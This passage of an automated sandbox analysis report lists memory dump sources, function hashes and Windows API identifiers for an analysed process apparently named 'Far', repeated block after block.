                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1144537725-0
                                                                                                                                                                      • Opcode ID: f6e778d5481c767fd5f0440b0ad4e2d6c9d4c8da62964ce3a4f4eaab6dc61537
                                                                                                                                                                      • Instruction ID: 7374e8f707d543dad284e3878cfc8c521d9c20c00e00a85afe9da9e451f0f62b
                                                                                                                                                                      • Opcode Fuzzy Hash: f6e778d5481c767fd5f0440b0ad4e2d6c9d4c8da62964ce3a4f4eaab6dc61537
                                                                                                                                                                      • Instruction Fuzzy Hash: 3041953190DB4A96EB51EF61E0443A9B3A8FB48F98F840135DA4C07759EF7DE144D760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                      • Opcode ID: c02fd4baf01237f737ce4c1dcfaf2efccd2abda1334b72e0db47e5205a9591d5
                                                                                                                                                                      • Instruction ID: 809df7501310b77fbadb83d6a1187f0e0796b9a84ac4cfe83aac845b28fea0be
                                                                                                                                                                      • Opcode Fuzzy Hash: c02fd4baf01237f737ce4c1dcfaf2efccd2abda1334b72e0db47e5205a9591d5
                                                                                                                                                                      • Instruction Fuzzy Hash: 9021A97260CA4486E710DF22E14036EB7A2FB84F88F944132DE9847B58EF7DD452DB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1687624791-0
                                                                                                                                                                      • Opcode ID: 537e8cc4a9b8a03ece6cc111119cfe6a6e861e43065a8b53b1c8da74cbaeeba0
                                                                                                                                                                      • Instruction ID: f36b312b28639fd472560f8d90878f4787bb0368b7bc5be71ce735aa765138ac
                                                                                                                                                                      • Opcode Fuzzy Hash: 537e8cc4a9b8a03ece6cc111119cfe6a6e861e43065a8b53b1c8da74cbaeeba0
                                                                                                                                                                      • Instruction Fuzzy Hash: C1118421F0C74BA1FE9476E4A6D02BD96819F50F64F980134DA6E0A2D2FF5CE454A321
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FullNamePathwcscat
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2785955394-0
                                                                                                                                                                      • Opcode ID: 127eaa6a34cafed49c1314ae5138e25092e900af035720f1fa20fb328c2c0b55
                                                                                                                                                                      • Instruction ID: 525fea3270b3cc719be302e5f85c3136ee3e39a7c934dcabaf45ec95ad7260b5
                                                                                                                                                                      • Opcode Fuzzy Hash: 127eaa6a34cafed49c1314ae5138e25092e900af035720f1fa20fb328c2c0b55
                                                                                                                                                                      • Instruction Fuzzy Hash: 97219021A0C65BA1E720FB91E4485AAA374FF48B84FC04131E98C43A96FF6CE549DB61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF73D07A792), ref: 00007FF73D084440
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF73D07A792), ref: 00007FF73D0844A5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentStrings$Free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3328510275-0
                                                                                                                                                                      • Opcode ID: cbac24d163c938635008e8d753191829c7a5b86d9880c2251e1248bd8dbaccbc
                                                                                                                                                                      • Instruction ID: 188375dfbb5c6a3bdd171175755192d1495c56aeea293330d02225e2b89b514d
                                                                                                                                                                      • Opcode Fuzzy Hash: cbac24d163c938635008e8d753191829c7a5b86d9880c2251e1248bd8dbaccbc
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C01D621B0DB4A51EE11BFA1A40007EA761EF84FE0BD81235EE6E037D5EF3CE4419250
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(?,?,?,00007FF73D087860,?,?,?,?,?,?,?,?,00000001,00007FF73D08791B), ref: 00007FF73D081898
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF73D087860,?,?,?,?,?,?,?,?,00000001,00007FF73D08791B), ref: 00007FF73D0818A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                      • Opcode ID: 3adfc0cfccd52941a49fddeb1409d6c56562e453e402605f126667e22865c99a
                                                                                                                                                                      • Instruction ID: f05dee1bb56cf041a679dcf67e4965ac37315370e838d75ada7ee94968e4ad2a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3adfc0cfccd52941a49fddeb1409d6c56562e453e402605f126667e22865c99a
                                                                                                                                                                      • Instruction Fuzzy Hash: 02010421B0C68691EE14ABA5F8410B8A650EF80FB0FD44331EA7E0B7D8EF3CD4159711
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 588628887-0
                                                                                                                                                                      • Opcode ID: 42f68b8e71bac882028bf66c597e2078b887fef472cc42d83bff0a16faef725e
                                                                                                                                                                      • Instruction ID: ad7ea89f8276f8630c99629bffa0e451bf54b759fc658ae4c541e152154f5489
                                                                                                                                                                      • Opcode Fuzzy Hash: 42f68b8e71bac882028bf66c597e2078b887fef472cc42d83bff0a16faef725e
                                                                                                                                                                      • Instruction Fuzzy Hash: E8E08650E0E64B62FF097BF2E8451B8D3D06F54F40FC44034D90D4B251FF2CA4516220
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 626452242-0
                                                                                                                                                                      • Opcode ID: 4535455b900882aaf790e7f59067dd516196d7937b3f2f68629ad60a155e21e9
                                                                                                                                                                      • Instruction ID: 192dbf6098a5538f048d2c8a2a3207209e0ca9bfca9ecfb2e8b309a68771ccfb
                                                                                                                                                                      • Opcode Fuzzy Hash: 4535455b900882aaf790e7f59067dd516196d7937b3f2f68629ad60a155e21e9
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A11D632709A8286E714EF52A80526DF7A5FB89FA0F984235DB5C47BA1DF3CE4119700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4122f6607503247c27fa8bc16122df2efaa86af47215780c771dcc2b771c25bf
                                                                                                                                                                      • Instruction ID: da311ea2b0983187b3354b82e85cf61b072d933975d9b04bd8a86ad8c1e1b079
                                                                                                                                                                      • Opcode Fuzzy Hash: 4122f6607503247c27fa8bc16122df2efaa86af47215780c771dcc2b771c25bf
                                                                                                                                                                      • Instruction Fuzzy Hash: 57E1AA33A08B8AE6EB10EFA5D4542ADB7B0FB44B88F904122DB5D07756EF38D185D720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2358735015-0
                                                                                                                                                                      • Opcode ID: 766e4debc9cf3e74d8ce01f985b95e8da0cdb02e6a148b9f5c33ae9715e6d7b2
                                                                                                                                                                      • Instruction ID: 7f362b0118331c37780551f4e12728a1309247a9f29185f3460c797a2fb1916b
                                                                                                                                                                      • Opcode Fuzzy Hash: 766e4debc9cf3e74d8ce01f985b95e8da0cdb02e6a148b9f5c33ae9715e6d7b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 3C41AD3260CB86A6E760EF91E8002A9B7A4FB84F90F948131EE9D43795EF3DD445D710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                      • Opcode ID: 68184e76846e2a5a039e555c917f1b53deee8bc2734a5a5e0af7f0d3c6fa0fdb
                                                                                                                                                                      • Instruction ID: 19fa9b56a6c5273068d3921889c738b50c78f8bf58fa4875cfb4b23287fbed04
                                                                                                                                                                      • Opcode Fuzzy Hash: 68184e76846e2a5a039e555c917f1b53deee8bc2734a5a5e0af7f0d3c6fa0fdb
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B413C32B0CB0AA5EA60DFFAD44856DA3A4FB01F44F964432EA1D07790EF78D841E320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                      • Opcode ID: 211d81ba4e95c7b917cab6fa29922d80261e097f6eb03e7746ebab567500a4e3
                                                                                                                                                                      • Instruction ID: ff277d7d2b9a4c54d78981ebd678f45c777ee3594d0dfc709b165dcdb508d817
                                                                                                                                                                      • Opcode Fuzzy Hash: 211d81ba4e95c7b917cab6fa29922d80261e097f6eb03e7746ebab567500a4e3
                                                                                                                                                                      • Instruction Fuzzy Hash: D8415E72B0CB49A6EB10EFA5D1903AC6761EB44F88F844135CE0D5B799EF78E491E360
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 420620b8ca5665b2aab043c4f852f3a66f8917ab6d22f6463380c731d114e54b
                                                                                                                                                                      • Instruction ID: 99c32c30124313402f186814aeb9a4b2b9d5021b0e8f40fe972d4b7e73e137b7
                                                                                                                                                                      • Opcode Fuzzy Hash: 420620b8ca5665b2aab043c4f852f3a66f8917ab6d22f6463380c731d114e54b
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E41B522A2D74DD2EB54AAE5E0486BDA790EB80F90FC44135DE4E0B3D5EF2CE441E720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      • Opcode ID: 73d6f54b0acb00cf1a15c6ed6d1caf4ae53321abc405d297f96d6bbb808fe526
                                                                                                                                                                      • Instruction ID: 992c40340b10e4e9d6abfbeb28d5190a6653f16612fe1c49afc518d1844c6ba8
                                                                                                                                                                      • Opcode Fuzzy Hash: 73d6f54b0acb00cf1a15c6ed6d1caf4ae53321abc405d297f96d6bbb808fe526
                                                                                                                                                                      • Instruction Fuzzy Hash: EC41B661B0D64A62FF64BBD5E490278E291EF80F40F914039EA4D07A95FF7EE841A760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b86d169e7560afa4168aed7a2dabe5f2bbf259b4efa93bae5d3df2e0b759e832
                                                                                                                                                                      • Instruction ID: be8bd6af9a2d2b7871a7fc811801be056497913c69e1aa8772f8413369710f4e
                                                                                                                                                                      • Opcode Fuzzy Hash: b86d169e7560afa4168aed7a2dabe5f2bbf259b4efa93bae5d3df2e0b759e832
                                                                                                                                                                      • Instruction Fuzzy Hash: 94219132E1C29EA5E6467B95A842279A550EF40FB0F844235E93D0B3C2EF7CE445A731
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 37c30ed743e6fe035d3229a037d1cac9763c3b3bf9a910d867315d60c1ecf4a2
                                                                                                                                                                      • Instruction ID: 541f06db1edcfa865a0b49c626daec3f48626e4f62fbc092274532cf40eb7c22
                                                                                                                                                                      • Opcode Fuzzy Hash: 37c30ed743e6fe035d3229a037d1cac9763c3b3bf9a910d867315d60c1ecf4a2
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D21B83271C64A97E7659F65E440379F6A0FB80F94F984234EA5D8B6D9EF2CD800DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
